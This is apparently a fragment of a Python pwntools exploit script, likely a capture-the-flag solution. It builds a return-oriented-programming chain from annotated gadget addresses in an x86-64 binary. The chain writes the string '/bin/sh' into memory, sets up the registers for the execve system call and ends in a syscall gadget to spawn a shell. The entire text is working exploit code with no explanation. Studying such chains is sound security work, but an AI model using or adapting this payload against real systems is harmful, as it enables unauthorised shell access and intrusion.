payload = p64(0x403de4)
#0x0000000000403de4: pop r12; ret; 
payload += p64(0x435200)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x405260)+p64(0x403dde)
# 0x0000000000403dde: mov qword ptr [r12], rbp; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x403de4)
# 0x0000000000403de4: pop r12; ret; 
payload += p64(0x435070)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f6e69622f)+p64(0x403dde)
# 0x0000000000403dde: mov qword ptr [r12], rbp; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x403877)
# 0x0000000000403877: pop rbx; pop rbp; ret; 
payload += p64(0x4351df)+p64(0x0)+p64(0x405f7b)
# 0x0000000000405f7b: pop rsi; ret; 
payload += p64(0x1435081)+p64(0x4163c9)
# 0x00000000004163c9: pop rdi; and dword ptr [rsi - 0xffff01], ecx; jmp qword ptr [rbx + 0x21]; 
payload += p64(0x435070)
# 0x0000000000405260: mov eax, dword ptr [rsp + 8]; add rsp, 0x28; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x402f2d)
# 0x0000000000402f2d: mov edx, eax; shr rdx, 0x3f; add rax, rdx; sar rax, 1; jne 0x2f3d; pop rbp; ret; 
payload += p64(0x0)+p64(0x405f7b)
# 0x0000000000405f7b: pop rsi; ret; 
payload += p64(0x0)+p64(0x405260)
# 0x0000000000405260: mov eax, dword ptr [rsp + 8]; add rsp, 0x28; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x0)+p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x41ba77)
# 0x000000000041ba77: syscall; 
payload += b''
